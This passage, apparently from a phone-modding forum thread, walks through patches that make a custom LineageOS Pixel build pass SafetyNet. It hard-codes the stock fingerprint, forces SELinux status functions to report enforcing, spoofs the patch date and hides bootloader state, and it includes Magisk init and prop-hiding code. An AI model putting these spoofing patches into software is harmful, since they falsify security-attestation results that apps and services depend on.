const prop_info* pi = __system_property_find(key.c_str());
if (pi == nullptr) return default_value;
If you have a Marlin, use the following:
Code:
diff --git a/base/properties.cpp b/base/properties.cpp
index d5a5918ce..49959ffad 100644
--- a/base/properties.cpp
+++ b/base/properties.cpp
@@ -79,6 +79,10 @@ static int __system_property_set(const char* key, const char* value) {
std::string GetProperty(const std::string& key, const std::string& default_value) {
std::string property_value;
+ if (key == "ro.build.fingerprint") {
+ property_value = "google/marlin/marlin:10/QP1A.191005.007.A1/5908163:user/release-keys";
+ return property_value;
+ }
#if defined(__BIONIC__)
const prop_info* pi = __system_property_find(key.c_str());
if (pi == nullptr) return default_value;
The value of the fingerprint is in the file device/google/marlin/lineage_[sailfish/marlin].mk. The patches above have a very simple job - if the ro.build.fingerprint property is requested, return a hard-coded value. Simple, works, but needs to be changed per device, and won't ever be seen in the Lineage repo :silly:
At the moment, the builds have SELinux in permissive mode. I've read that one of the CTS profile checks is to ensure that SELinux is in enforcing mode. We can override this by patching two files from within the external/selinux folder
Code:
diff --git a/libselinux/src/selinux_config.c b/libselinux/src/selinux_config.c
index b06cb63b..7877010c 100644
--- a/libselinux/src/selinux_config.c
+++ b/libselinux/src/selinux_config.c
@@ -87,44 +87,8 @@ static const uint16_t file_path_suffixes_idx[NEL] = {
int selinux_getenforcemode(int *enforce)
{
- int ret = -1;
- FILE *cfg = fopen(SELINUXCONFIG, "re");
- if (cfg) {
- char *buf;
- int len = sizeof(SELINUXTAG) - 1;
- buf = malloc(selinux_page_size);
- if (!buf) {
- fclose(cfg);
- return -1;
- }
- while (fgets_unlocked(buf, selinux_page_size, cfg)) {
- if (strncmp(buf, SELINUXTAG, len))
- continue;
- if (!strncasecmp
- (buf + len, "enforcing", sizeof("enforcing") - 1)) {
- *enforce = 1;
- ret = 0;
- break;
- } else
- if (!strncasecmp
- (buf + len, "permissive",
- sizeof("permissive") - 1)) {
- *enforce = 0;
- ret = 0;
- break;
- } else
- if (!strncasecmp
- (buf + len, "disabled",
- sizeof("disabled") - 1)) {
- *enforce = -1;
- ret = 0;
- break;
- }
- }
- fclose(cfg);
- free(buf);
- }
- return ret;
+ *enforce = 1;
+ return 0;
}
hidden_def(selinux_getenforcemode)
diff --git a/libselinux/src/sestatus.c b/libselinux/src/sestatus.c
index ed29dc55..5b057932 100644
--- a/libselinux/src/sestatus.c
+++ b/libselinux/src/sestatus.c
@@ -130,30 +130,7 @@ int selinux_status_updated(void)
*/
int selinux_status_getenforce(void)
{
- uint32_t seqno;
- uint32_t enforcing;
-
- if (selinux_status == NULL) {
- errno = EINVAL;
- return -1;
- }
-
- if (selinux_status == MAP_FAILED) {
- if (avc_netlink_check_nb() < 0)
- return -1;
-
- return fallback_enforcing;
- }
-
- /* sequence must not be changed during references */
- do {
- seqno = read_sequence(selinux_status);
-
- enforcing = selinux_status->enforcing;
-
- } while (seqno != read_sequence(selinux_status));
-
- return enforcing ? 1 : 0;
+ return 1;
}
/*
Now, I have a script that does the steps of:
Sets up a user build
Builds the appropriate files used for a signed build
Signs the APKs
Creates an installable zip / OTA from the signed zips
Code:
#!/bin/bash
echo "This script must be sourced."
BUILD="user"
DEVICE="sailfish"
DATE=$(date +%Y-%m-%d)
VERSION=17.0
croot && lunch lineage_$DEVICE-$BUILD
SIGNED_TARGET="$OUT/lineage-$VERSION-$DEVICE-signed-target_files-$BUILD-$DATE.zip"
SIGNED_OTA="$OUT/lineage-$VERSION-$DEVICE-signed-ota-$BUILD-$DATE.zip"
mka target-files-package otatools && \
./build/tools/releasetools/sign_target_files_apks -o -d ~/.android-certs $OUT/obj/PACKAGING/target_files_intermediates/*-target_files-*.zip $SIGNED_TARGET && \
./build/tools/releasetools/ota_from_target_files -k ~/.android-certs/releasekey --block $SIGNED_TARGET $SIGNED_OTA
It must be sourced (i.e. source do-build #or whatever you call the script). You can easily change some of the parameters above, e.g. sailfish to marlin.
So for my testing, after doing the above changes, I can get a basic integrity pass in Safety Net, but not a CTS profile pass. I tried using Magisk, and it passes Safety Net without the need for using any further prop tweaks (normally I would still need one of those). So at least that is a little bit of progress.
Hope that this is helpful to someone. And if anyone has any other insights as to what can be done to try and get a CTS profile match, let us all know!
NZedPred said:
I mentioned before I was going to attempt to do a build that would pass safety net without needing to install Magisk and use hiding modules. I haven't quite managed that, but thought I'd post details of the progress that I've made.
Note for the below, I have a Pixel, so my codename is always sailfish - replace with marlin for the Pixel XL. Also, follow the instructions above to include MindTheGapps (you need the Google services to do the SafetyNet check).
Now, importantly I found that the Eleven app didn't compile under a user build (it's fine in a userdebug build). If you find the same issue, best to remove it from the project by adding this to a local manifest, e.g. .repo/local_manifest/excluded-projects.xml
Code:
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<!-- Does not compile in a user build -->
<remove-project name="LineageOS/android_packages_apps_Eleven" />
</manifest>
Follow instructions in this link to set up some build keys:
https://wiki.lineageos.org/signing_builds.html (the section Generating the keys). For convenience, the commands are pasted below (customize the subject):
Code:
subject='/C=US/ST=California/L=Mountain View/O=Android/OU=Android/CN=Android/[email protected]'
mkdir ~/.android-certs
for x in releasekey platform shared media testkey; do \
./development/tools/make_key ~/.android-certs/$x "$subject"; \
done
Now for building, do a 'repo sync' and 'source build/envsetup.sh' as you normally would, but now it's time to apply a few patches.
Kernel command line patch:
https://gist.github.com/kirelagin/211af699bd321f9448d310502074bd9c
Or get the raw version of the patch directly here:
https://gist.githubusercontent.com/...e45f468cbefc3a9c571bd3d8b2a877/safetynet.diff
This patch needs to be applied to the kernel/google/marlin folder. Its purpose is to change a few flags in the command line to remove the fact that the bootloader is unlocked, etc.
Code:
cd kernel/google/marlin
git apply safetynet.diff
The below is not required now, a recent patch fixed this issue
Now normally, as the build files replace the device fingerprint with the fingerprint from stock, we would expect that doing e.g. in a shell in the rom "getprop | grep fingerprint" would return said fingerprint in all cases. However, I always found that one, 'ro.build.fingerprint' would always be the default Lineage build fingerprint. I couldn't find how to get that one in particular to be the same as the others, so I ended up doing something that isn't portable but works
Patch system/code/base/properties.cpp by applying one of the following patches (you must be within the system/code folder)
Sailfish:
Code:
diff --git a/base/properties.cpp b/base/properties.cpp
index d5a5918ce..49959ffad 100644
--- a/base/properties.cpp
+++ b/base/properties.cpp
@@ -79,6 +79,10 @@ static int __system_property_set(const char* key, const char* value) {
std::string GetProperty(const std::string& key, const std::string& default_value) {
std::string property_value;
+ if (key == "ro.build.fingerprint") {
+ property_value = "google/sailfish/sailfish:10/QP1A.191005.007.A1/5908163:user/release-keys";
+ return property_value;
+ }
#if defined(__BIONIC__)
const prop_info* pi = __system_property_find(key.c_str());
if (pi == nullptr) return default_value;
If you have a Marlin, use the following:
Code:
diff --git a/base/properties.cpp b/base/properties.cpp
index d5a5918ce..49959ffad 100644
--- a/base/properties.cpp
+++ b/base/properties.cpp
@@ -79,6 +79,10 @@ static int __system_property_set(const char* key, const char* value) {
std::string GetProperty(const std::string& key, const std::string& default_value) {
std::string property_value;
+ if (key == "ro.build.fingerprint") {
+ property_value = "google/marlin/marlin:10/QP1A.191005.007.A1/5908163:user/release-keys";
+ return property_value;
+ }
#if defined(__BIONIC__)
const prop_info* pi = __system_property_find(key.c_str());
if (pi == nullptr) return default_value;
The value of the fingerprint is in the file device/google/marlin/lineage_[sailfish/marlin].mk. The patches above have a very simple job - if the ro.build.fingerprint property is requested, return a hard-coded value. Simple, works, but needs to be changed per device, and won't ever be seen in the Lineage repo :silly:
At the moment, the builds have SELinux in permissive mode. I've read that one of the CTS profile checks is to ensure that SELinux is in enforcing mode. We can override this by patching two files from within the external/selinux folder
Code:
diff --git a/libselinux/src/selinux_config.c b/libselinux/src/selinux_config.c
index b06cb63b..7877010c 100644
--- a/libselinux/src/selinux_config.c
+++ b/libselinux/src/selinux_config.c
@@ -87,44 +87,8 @@ static const uint16_t file_path_suffixes_idx[NEL] = {
int selinux_getenforcemode(int *enforce)
{
- int ret = -1;
- FILE *cfg = fopen(SELINUXCONFIG, "re");
- if (cfg) {
- char *buf;
- int len = sizeof(SELINUXTAG) - 1;
- buf = malloc(selinux_page_size);
- if (!buf) {
- fclose(cfg);
- return -1;
- }
- while (fgets_unlocked(buf, selinux_page_size, cfg)) {
- if (strncmp(buf, SELINUXTAG, len))
- continue;
- if (!strncasecmp
- (buf + len, "enforcing", sizeof("enforcing") - 1)) {
- *enforce = 1;
- ret = 0;
- break;
- } else
- if (!strncasecmp
- (buf + len, "permissive",
- sizeof("permissive") - 1)) {
- *enforce = 0;
- ret = 0;
- break;
- } else
- if (!strncasecmp
- (buf + len, "disabled",
- sizeof("disabled") - 1)) {
- *enforce = -1;
- ret = 0;
- break;
- }
- }
- fclose(cfg);
- free(buf);
- }
- return ret;
+ *enforce = 1;
+ return 0;
}
hidden_def(selinux_getenforcemode)
diff --git a/libselinux/src/sestatus.c b/libselinux/src/sestatus.c
index ed29dc55..5b057932 100644
--- a/libselinux/src/sestatus.c
+++ b/libselinux/src/sestatus.c
@@ -130,30 +130,7 @@ int selinux_status_updated(void)
*/
int selinux_status_getenforce(void)
{
- uint32_t seqno;
- uint32_t enforcing;
-
- if (selinux_status == NULL) {
- errno = EINVAL;
- return -1;
- }
-
- if (selinux_status == MAP_FAILED) {
- if (avc_netlink_check_nb() < 0)
- return -1;
-
- return fallback_enforcing;
- }
-
- /* sequence must not be changed during references */
- do {
- seqno = read_sequence(selinux_status);
-
- enforcing = selinux_status->enforcing;
-
- } while (seqno != read_sequence(selinux_status));
-
- return enforcing ? 1 : 0;
+ return 1;
}
/*
Now, I have a script that does the steps of:
Sets up a user build
Builds the appropriate files used for a signed build
Signs the APKs
Creates an installable zip / OTA from the signed zips
Code:
#!/bin/bash
echo "This script must be sourced."
BUILD="user"
DEVICE="sailfish"
DATE=$(date +%Y-%m-%d)
VERSION=17.0
croot && lunch lineage_$DEVICE-$BUILD
SIGNED_TARGET="$OUT/lineage-$VERSION-$DEVICE-signed-target_files-$BUILD-$DATE.zip"
SIGNED_OTA="$OUT/lineage-$VERSION-$DEVICE-signed-ota-$BUILD-$DATE.zip"
mka target-files-package otatools && \
./build/tools/releasetools/sign_target_files_apks -o -d ~/.android-certs $OUT/obj/PACKAGING/target_files_intermediates/*-target_files-*.zip $SIGNED_TARGET && \
./build/tools/releasetools/ota_from_target_files -k ~/.android-certs/releasekey --block $SIGNED_TARGET $SIGNED_OTA
It must be sourced (i.e. source do-build #or whatever you call the script). You can easily change some of the parameters above, e.g. sailfish to marlin.
So for my testing, after doing the above changes, I can get a basic integrity pass in Safety Net, but not a CTS profile pass. I tried using Magisk, and it passes Safety Net without the need for using any further prop tweaks (normally I would still need one of those). So at least that is a little bit of progress.
Hope that this is helpful to someone. And if anyone has any other insights as to what can be done to try and get a CTS profile match, let us all know!
Click to expand...
Click to collapse
So to my understanding, is that you've been able pass the basic integrity check, but not the ctsProfile, however, once you flash Magisk, it all sudden starts working w/o the MagiskProps module?? My goal for my builds of lineage is to completely get rid of Magisk as a whole, and have the apps I normally flash with Magisk pre-installed (just YouTube Vanced and Viper4android at the moment) and a few build.prop tweaks.
What I'm thinking for conquering this idea of yours is to copy the files that MagiskProps creates/modifies in it's module directory, and then have those files pushed automatically to the image when being built.
What do you think of that?
GT3CH1 said:
So to my understanding, is that you've been able pass the basic integrity check, but not the ctsProfile, however, once you flash Magisk, it all sudden starts working w/o the MagiskProps module?? My goal for my builds of lineage is to completely get rid of Magisk as a whole, and have the apps I normally flash with Magisk pre-installed (just YouTube Vanced and Viper4android at the moment) and a few build.prop tweaks.
What I'm thinking for conquering this idea of yours is to copy the files that MagiskProps creates/modifies in it's module directory, and then have those files pushed automatically to the image when being built.
What do you think of that?
Click to expand...
Click to collapse
Hey, yes we have similar goals there. I'm hoping to build Lineage without the need for Magisk to pass SafetyNet including the CTS profile check, and add in my own selection of apps etc.
I have been looking at the code for Magisk, hoping to work out exactly what it does. I'm not so sure it will be as simple as copying files as you have said above, although I have toyed with that idea in my head. If you work out how to do that, certainly let us know.
Another idea I had was to see if Magisk can be compiled to act as it currently does but without including the su, busybox, and other binaries that would trip SafetyNet.
Edit: I'm also just trying to find specific things that Magisk does to aid hiding. For example, I found this in the hide_policy.cpp file:
Code:
static const char *prop_key[] =
{ "ro.boot.vbmeta.device_state", "ro.boot.verifiedbootstate", "ro.boot.flash.locked",
"ro.boot.veritymode", "ro.boot.warranty_bit", "ro.warranty_bit", "ro.debuggable",
"ro.secure", "ro.build.type", "ro.build.tags", "ro.build.selinux", nullptr };
static const char *prop_value[] =
{ "locked", "green", "1",
"enforcing", "0", "0", "0",
"1", "user", "release-keys", "0", nullptr };
void hide_sensitive_props() {
LOGI("hide_policy: Hiding sensitive props\n");
// Hide all sensitive props
for (int i = 0; prop_key[i]; ++i) {
auto value = getprop(prop_key[i]);
if (!value.empty() && value != prop_value[i])
setprop(prop_key[i], prop_value[i], false);
}
}
That is used to override some of the props, if they aren't empty and don't match the required values. In the case of my build, they all match the values above or are empty. So I'm still digging into the code to find out what else might be needed. I do know that SELinux is set to Enforcing (hence my patch in my previous post) as another example.
NZedPred said:
Hey, yes we have similar goals there. I'm hoping to build Lineage without the need for Magisk to pass SafetyNet including the CTS profile check, and add in my own selection of apps etc.
I have been looking at the code for Magisk, hoping to work out exactly what it does. I'm not so sure it will be as simple as copying files as you have said above, although I have toyed with that idea in my head. If you work out how to do that, certainly let us know.
Another idea I had was to see if Magisk can be compiled to act as it currently does but without including the su, busybox, and other binaries that would trip SafetyNet.
Edit: I'm also just trying to find specific things that Magisk does to aid hiding. For example, I found this in the hide_policy.cpp file:
Code:
static const char *prop_key[] =
{ "ro.boot.vbmeta.device_state", "ro.boot.verifiedbootstate", "ro.boot.flash.locked",
"ro.boot.veritymode", "ro.boot.warranty_bit", "ro.warranty_bit", "ro.debuggable",
"ro.secure", "ro.build.type", "ro.build.tags", "ro.build.selinux", nullptr };
static const char *prop_value[] =
{ "locked", "green", "1",
"enforcing", "0", "0", "0",
"1", "user", "release-keys", "0", nullptr };
void hide_sensitive_props() {
LOGI("hide_policy: Hiding sensitive props\n");
// Hide all sensitive props
for (int i = 0; prop_key[i]; ++i) {
auto value = getprop(prop_key[i]);
if (!value.empty() && value != prop_value[i])
setprop(prop_key[i], prop_value[i], false);
}
}
That is used to override some of the props, if they aren't empty and don't match the required values. In the case of my build, they all match the values above or are empty. So I'm still digging into the code to find out what else might be needed. I do know that SELinux is set to Enforcing (hence my patch in my previous post) as another example.
Click to expand...
Click to collapse
Hmm. I wonder if Magisk is using itself to check ctsProfile via root... It would make sense to me if it did.
Are you able to install Google Apps through the playstore (ie Google Calendar). When I had a failing ctsProfile, I wasn't able to install google calendar.
Eureka!
GT3CH1 said:
Hmm. I wonder if Magisk is using itself to check ctsProfile via root... It would make sense to me if it did.
Are you able to install Google Apps through the playstore (ie Google Calendar). When I had a failing ctsProfile, I wasn't able to install google calendar.
Click to expand...
Click to collapse
I believe the phrase is "Eureka!"
I erred before - when I went back to installing Magisk, of course it keeps modules installed, which resulted in the pass. It would have failed...
However, reading the props module read me said that the security_patch date had to match that of the fingerprint. So I ended the build/make/core/version_defaults.mk file so that PLATFORM_SECURITY_PATCH is 2019-10-06 as per this patch:
Code:
diff --git a/core/version_defaults.mk b/core/version_defaults.mk
index b803ff81a..08ffb1a53 100644
--- a/core/version_defaults.mk
+++ b/core/version_defaults.mk
@@ -250,7 +250,7 @@ ifndef PLATFORM_SECURITY_PATCH
# It must be of the form "YYYY-MM-DD" on production devices.
# It must match one of the Android Security Patch Level strings of the Public Security Bulletins.
# If there is no $PLATFORM_SECURITY_PATCH set, keep it empty.
- PLATFORM_SECURITY_PATCH := 2019-11-05
+ PLATFORM_SECURITY_PATCH := 2019-10-06
endif
.KATI_READONLY := PLATFORM_SECURITY_PATCH
hello every body
i hope all of you have a good health and good life...sorry if my english is rubbish
my question is that magisk v23 deosn't flash my phone in right way it working prefectly on v24+ but i just not comfortable with magisk hide removed and zygisk and more things i found that commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 solved the problem with fstab iam not a developer iam just a user but i could help my self to understand by guides
so is there a way to change or to apply this changes in commit to v23 and flash my phone with it ...and if so i would really apperciate a quick gide to help me to do so...
thanks in advance
i hope you all have a good day
eslam.essa.2011 said:
hello every body
i hope all of you have a good health and good life...sorry if my english is rubbish
my question is that magisk v23 deosn't flash my phone in right way it working prefectly on v24+ but i just not comfortable with magisk hide removed and zygisk and more things i found that commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 solved the problem with fstab iam not a developer iam just a user but i could help my self to understand by guides
so is there a way to change or to apply this changes in commit to v23 and flash my phone with it ...and if so i would really apperciate a quick gide to help me to do so...
thanks in advance
i hope you all have a good day
Click to expand...
Click to collapse
Here, try this 3rd party version of Magisk 25.2 Delta. It has Magiskhide and no need to turn on Zygisk. You probably will have to patch your boot.img though. There is info on how to move to this version of Magisk... If you want LSPosed, first download Riru v26.1.6 , install that and reboot, then get LSPosedd riru 1.8.3, install and reboot. You can hide all banking apps and most that don't work with zygisk turned on. There is a good explanation of how Zygisk can be detected by a lot of apps. Hope this helps.
bobfrantic said:
Here, try this 3rd party version of Magisk 25.2 Delta. It has Magiskhide and no need to turn on Zygisk. You probably will have to patch your boot.img though. There is info on how to move to this version of Magisk... If you want LSPosed, first download Riru v26.1.6 , install that and reboot, then get LSPosedd riru 1.8.3, install and reboot. You can hide all banking apps and most that don't work with zygisk turned on. There is a good explanation of how Zygisk can be detected by a lot of apps. Hope this helps.
Click to expand...
Click to collapse
lots of bugs my friend sorry iam late for reading your reply+test it
iam need to build magisk from source after editing this file from v23.0 https://github.com/topjohnwu/Magisk/blob/v23.0/native/jni/init/twostage.cpp to be similar and function to this file from v24.2 https://github.com/topjohnwu/Magisk/blob/v24.2/native/jni/init/twostage.cpp but i got errors when start to build binaries any help from here ?
eslam.essa.2011 said:
lots of bugs my friend sorry iam late for reading your reply+test it
iam need to build magisk from source after editing this file from v23.0 https://github.com/topjohnwu/Magisk/blob/v23.0/native/jni/init/twostage.cpp to be similar and function to this file from v24.2 https://github.com/topjohnwu/Magisk/blob/v24.2/native/jni/init/twostage.cpp but i got errors when start to build binaries any help from here ?
Click to expand...
Click to collapse
sorry can't assist you with editing the file...
bobfrantic said:
sorry can't assist you with editing the file...
Click to expand...
Click to collapse
its ok my friend thanks for trying to help anyway
if you would please....if you know someone here who can please mention him/her here
hope you have a good day
@Didgeridoohan any help here brother if you may accept this
my problem is that i edited v23.0 twostage.cpp to be similar to this commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 wich solve bootloop for samsung a528b/a52s 5g but after build then flash the stock AP file with my new build magisk it still get bootloop what i did wrong i attached twostage.cpp after editing and many thanks to all of xda users who would help me and who wouldn't
Code:
#include <sys/mount.h>
#include <magisk.hpp>
#include <utils.hpp>
#include <socket.hpp>
#include "init.hpp"
using namespace std;
void fstab_entry::to_file(FILE *fp) {
fprintf(fp, "%s %s %s %s %s\n", dev.data(), mnt_point.data(),
type.data(), mnt_flags.data(), fsmgr_flags.data());
}
#define set_info(val) \
line[val##1] = '\0'; \
entry.val = &line[val##0];
#define FSR "/first_stage_ramdisk"
extern uint32_t patch_verity(void *buf, uint32_t size);
void FirstStageInit::prepare() {
if (cmd->force_normal_boot) {
xmkdirs(FSR "/system/bin", 0755);
rename("/init" /* magiskinit */, FSR "/system/bin/init");
symlink("/system/bin/init", FSR "/init");
rename("/.backup/init", "/init");
rename("/.backup", FSR "/.backup");
rename("/overlay.d", FSR "/overlay.d");
chdir(FSR);
} else {
xmkdir("/system", 0755);
xmkdir("/system/bin", 0755);
rename("/init" /* magiskinit */ , "/system/bin/init");
rename("/.backup/init", "/init");
}
char fstab_file[128];
fstab_file[0] = '\0';
// Find existing fstab file
for (const char *suffix : { cmd->fstab_suffix, cmd->hardware, cmd->hardware_plat }) {
if (suffix[0] == '\0')
continue;
for (const char *prefix: { "odm/etc/fstab", "vendor/etc/fstab", "fstab" }) {
sprintf(fstab_file, "%s.%s", prefix, suffix);
if (access(fstab_file, F_OK) != 0) {
fstab_file[0] = '\0';
} else {
LOGD("Found fstab file: %s\n", fstab_file);
goto exit_loop;
}
}
}
exit_loop:
// Try to load dt fstab
vector<fstab_entry> fstab;
read_dt_fstab(fstab);
if (!fstab.empty()) {
// Dump dt fstab to fstab file in rootfs and force init to use it instead
// All dt fstab entries should be first_stage_mount
for (auto &entry : fstab) {
if (!str_contains(entry.fsmgr_flags, "first_stage_mount")) {
if (!entry.fsmgr_flags.empty())
entry.fsmgr_flags += ',';
entry.fsmgr_flags += "first_stage_mount";
}
}
if (fstab_file[0] == '\0') {
const char *suffix =
cmd->fstab_suffix[0] ? cmd->fstab_suffix :
(cmd->hardware[0] ? cmd->hardware :
(cmd->hardware_plat[0] ? cmd->hardware_plat : nullptr));
if (suffix == nullptr) {
LOGE("Cannot determine fstab suffix!\n");
return;
}
sprintf(fstab_file, "fstab.%s", suffix);
}
// Patch init to force IsDtFstabCompatible() return false
auto init = mmap_data::rw("/init");
init.patch({ make_pair("android,fstab", "xxx") });
} else {
// Parse and load the fstab file
file_readline(fstab_file, [&](string_view l) -> bool {
if (l[0] == '#' || l.length() == 1)
return true;
char *line = (char *) l.data();
int dev0, dev1, mnt_point0, mnt_point1, type0, type1,
mnt_flags0, mnt_flags1, fsmgr_flags0, fsmgr_flags1;
sscanf(line, "%n%*s%n %n%*s%n %n%*s%n %n%*s%n %n%*s%n",
&dev0, &dev1, &mnt_point0, &mnt_point1, &type0, &type1,
&mnt_flags0, &mnt_flags1, &fsmgr_flags0, &fsmgr_flags1);
fstab_entry entry;
set_info(dev);
set_info(mnt_point);
set_info(type);
set_info(mnt_flags);
set_info(fsmgr_flags);
fstab.emplace_back(std::move(entry));
return true;
});
}
{
LOGD("Write fstab file: %s\n", fstab_file);
auto fp = xopen_file(fstab_file, "we");
for (auto &entry : fstab) {
// Redirect system mnt_point so init won't switch root in first stage init
if (entry.mnt_point == "/system")
entry.mnt_point = "/system_root";
// Force remove AVB for 2SI since it may bootloop some devices
auto len = patch_verity(entry.fsmgr_flags.data(), entry.fsmgr_flags.length());
entry.fsmgr_flags.resize(len);
entry.to_file(fp.get());
}
}
chmod(fstab_file, 0644);
chdir("/");
}
#define INIT_PATH "/system/bin/init"
#define REDIR_PATH "/system/bin/am"
void SARInit::first_stage_prep() {
xmount("tmpfs", "/dev", "tmpfs", 0, "mode=755");
// Patch init binary
int src = xopen("/init", O_RDONLY);
int dest = xopen("/dev/init", O_CREAT | O_WRONLY, 0);
{
auto init = mmap_data::ro("/init");
init.patch({ make_pair(INIT_PATH, REDIR_PATH) });
write(dest, init.buf, init.sz);
fclone_attr(src, dest);
close(dest);
}
// Replace redirect init with magiskinit
dest = xopen("/dev/magiskinit", O_CREAT | O_WRONLY, 0);
write(dest, self.buf, self.sz);
fclone_attr(src, dest);
close(src);
close(dest);
xmount("/dev/init", "/init", nullptr, MS_BIND, nullptr);
xmount("/dev/magiskinit", REDIR_PATH, nullptr, MS_BIND, nullptr);
xumount2("/dev", MNT_DETACH);
// Block SIGUSR1
sigset_t block, old;
sigemptyset(&block);
sigaddset(&block, SIGUSR1);
sigprocmask(SIG_BLOCK, &block, &old);
if (int child = xfork()) {
LOGD("init daemon [%d]\n", child);
// Wait for children signal
int sig;
sigwait(&block, &sig);
// Restore sigmask
sigprocmask(SIG_SETMASK, &old, nullptr);
} else {
// Establish socket for 2nd stage ack
struct sockaddr_un sun;
int sockfd = xsocket(AF_LOCAL, SOCK_STREAM | SOCK_CLOEXEC, 0);
xbind(sockfd, (struct sockaddr*) &sun, setup_sockaddr(&sun, INIT_SOCKET));
xlisten(sockfd, 1);
// Resume parent
kill(getppid(), SIGUSR1);
// Wait for second stage ack
int client = xaccept4(sockfd, nullptr, nullptr, SOCK_CLOEXEC);
// Write backup files
string tmp_dir = read_string(client);
chdir(tmp_dir.data());
int cfg = xopen(INTLROOT "/config", O_WRONLY | O_CREAT, 0);
xwrite(cfg, config.buf, config.sz);
close(cfg);
restore_folder(ROOTOVL, overlays);
// Ack and bail out!
write_int(client, 0);
close(client);
close(sockfd);
exit(0);
}
}